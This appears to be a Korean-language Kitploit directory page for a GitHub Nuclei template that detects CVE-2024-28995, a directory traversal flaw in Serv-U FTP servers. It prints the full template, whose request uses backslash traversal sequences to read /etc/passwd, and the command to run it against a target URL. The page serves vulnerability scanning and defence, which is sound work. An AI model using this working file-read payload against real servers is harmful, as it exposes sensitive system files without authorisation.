Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-28995-Nuclei-Template — CVE-2024-28995를 탐지하기 위한 Nuclei 템플릿으로, Serv-U FTP 서버의 디렉토리 탐색 취약점으로 인해 조작된 HTTP 요청을 통해 파일을 읽을 수 있습니다. | Kitploit
도구/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Vulnerability ScannersWeb Vulnerability ScannersVulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

CVE-2024-28995를 탐지하기 위한 Nuclei 템플릿으로, Serv-U FTP 서버의 디렉토리 탐색 취약점으로 인해 조작된 HTTP 요청을 통해 파일을 읽을 수 있습니다.

저장소 보기
142년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-28995 Nuclei 템플릿

Serv-U 15.4.2 이하 버전의 디렉토리 트래버설 취약점을 확인하며, /etc/passwd와 같은 민감한 파일을 읽을 수 있습니다.

템플릿 상세

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



사용법

Nuclei와 함께 이 템플릿을 사용하려면 템플릿 내용을 CVE-2024-28995.yaml 파일로 저장한 후 다음 명령을 실행하세요:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

<target-url>을 스캔하려는 대상의 URL로 바꾸십시오.

연락처

문의사항이나 추가 정보가 필요하시면 다음을 통해 연락해 주세요:

  • LinkedIn
  • Twitter
도구 다운로드